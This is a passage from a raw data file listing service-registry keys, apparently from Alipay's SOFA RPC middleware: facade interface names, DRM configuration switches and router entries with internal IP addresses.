om.alipay.insxhcprod.common.service.facade.CrowdFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.AdminService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.datacontextlib.service.facade.limitcum.CumulateStoreFacade:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.component.service.impl.mocker.ProcessMocker:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.44.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.permlimit.api.PermLimitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.192.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.integration.biscenter.UEMOperationPermissionServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.core.service.security.SecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.151.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.access.OauthAuthTokenServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fppolicyfindx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-F-TRANSDATA_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insscenemarket.common.facade.InsMktInsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcif.common.service.facade.api.role.MerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.CollectReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.core.service.stuff.StuffCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceAppQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.po.PoProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.iot.IotOperationConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.IdpConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.MartMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zpaas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mw-chain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ceresmeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antscheduler.facade.IJobGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.PrizeCacheModelQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.145.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfcenter_payment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreementfactory.launch.PcreditSceneLaunchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.open.OneKeyActivityOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:newLifemngReconLiquidationConfCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.isUseTairCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.kbticketcenter.KbtOperateUseTicketService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alipaymember.common.service.facade.config.service.BenefitConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antiep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.UioCrowdLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.TranslationManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundselling.common.service.contract.facade.ContractInvesetAmountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserBizInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.miniappexam.facade.api.MiniAppToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:www.baidu.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.TargetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.digestClient,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.RealtimeQcServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.node.SdkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.grayLevelDeploySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.income.common.service.facade.PaymentBillQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:artest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.record.service.DividendRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.reindeer.WorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestprod.common.service.facade.InstitutionLifecycleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.api.EventControlApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cardbin.common.service.facade.CardBinValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.WTOperateTraceQueryFacade:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirecenter.biz.shared.inner.service.advice.FinancialAdviceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.integration.emcevent.AlarmEventSyncFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityprodmng.common.service.facade.QueryCtuEventService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.facade.api.DisputeFileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.portal.api.loan.ContractQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.common.service.facade.api.scene.SceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.application.common.service.facade.api.unusual.UnusualOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mybank-yuque@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopWhiteListBizExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lifemsgprod.common.service.facade.subscribe.SubscribeRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ordercore:name=com.alipay.ordercore.drop.level.openServiceDetailLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membertangram.common.service.facade.component.lottery.ComponentLotteryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.bookmark.facade.BookMarkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.QuickInvestigationTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessTaskAccessor:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmFileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.task.TaskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamAttrManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.drcc.facade.IdcDrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.RiskManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsApiVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.finassetcore.AssetProfileQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:wealthhottwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditplan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.extitem.api.ExtitemQueryBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_TIMEOUT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.common.service.facade.api.InsGaoDeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","bizfundprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.distinguishprod.common.service.facade.pet.PetConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.api.miniuserrel.MiniUserRelDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.wealthscore.api.WealthScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditplan.adjust.PcreditPlanAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariablePriorityStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassettrade.fintradespi.spi.FinTradeBuySpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.implement.ImplementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.module.InsIopModuleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.FamilyRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.fopRecContentOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdecision.common.service.facade.api.WaterLineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.accha.core.drm.FailoverSwitchDrmResource.failoverStatus4,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxrouter.common.service.facade.api.OutgoingRouterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.atomic.model.context.IExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adc.demand.facade.DemandService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.rate.triple.RateStatisticTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdecorate.neardata.decorate.service.DecorateConfQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OpscloudCheckRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.insure.AutoGiftPackageFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dwsap.common.service.facade.dsdc.SyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.requiremng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.facade.migrate.DataMigrateFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.AntxConfManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.miniplan.MiniPlanInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterAutoIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedOldData2SyncTableDrm.selectTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.ALIPAYJSESSIONID.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ihkprod.common.service.facade.promotion.point.api.PointRedemptOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zparamcore_parmMntListWorkflowPubStatusCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testdemo.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.payment.api.FreezeOrderHisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_XL_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.clientUpgrade.ClientLoginUpgradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.rcconsultcore.common.service.facade.api.RcConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antcloud.acbillingcore.common.service.facade.ChargeBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.csportal.FinsAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.facade.servicedispense.ServiceDispenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.mavenConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesAccGoldTransferOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSCLAIMCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.ImgContentFacade:1.0:promocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamweb.common.service.facade.common.TokenCompatibleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.biz.service.impl.manage.ConfigurationManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.meta.facade.service.ServiceBeanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.girisk.core.service.cache.LocalCacheManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPSCONFREG#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_PAGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.baoxian.scene.facade.common.trade.service.AliSceneInsuranceService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.basic.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbconfigcenter.common.service.facade.api.BizConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.closeRewardFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.124.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linkede.metacenter.rest.ZoneMetaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.omocore.common.page.api.PageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.indicator.RuntimeNodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.needSyncSceneType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.question.structured.facade.WordGroupQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.dingqiTestLoadFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.67.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.aipYieldValueFilterOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0:antschedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.operator.PamPropertyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.AntqOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custcenter.service.facade.contactpoint.ContactPointManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OLD_CLIENTSERVICE_TEST_2_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ilimitcenter.service.facade.api.LimitCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.tis.service.CounterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.checker.FcdepcoreCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemsgprod.common.service.facade.admin.template.SceneRuleDefinitionAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.QueryCheckResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.duty.HealthDiseaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.core.service.repository.DistrictRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.api.TaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.service.drm.FPASwitchConfigDrm.switchReadCompare,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.knowing.facade.gray.service.KnowingGrayStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftSnsShareService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.102.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.console.RoleServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.mng.terminal.operator.MerchantTerminalDelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianapi.client.SystemExterfaceInvokeService:1.0:instradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:kabaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfmreceipt.service.facade.api.VostroOrderMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.opinioncoreCacheName.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:paymentmngTaskcenterCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbinteligentpromo.common.service.facade.api.WhiteListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorcenter.common.service.fixedinvestment.facade.FixedInvestContractManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:opsfree@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antopo.common.service.facade.biz.table.onlinetable.TableDeploymentRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mychain.openchain.endpoint.facade.OpenchainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bizfundprod.common.service.facade.fund.ProductInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.facade.fund.api.FinishDailyAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthgoldtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.content.service.facade.CheckGroupSceneSynchronous:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acpmscore.facade.EmployeeFacade#@#DEFAULT_INSTANCE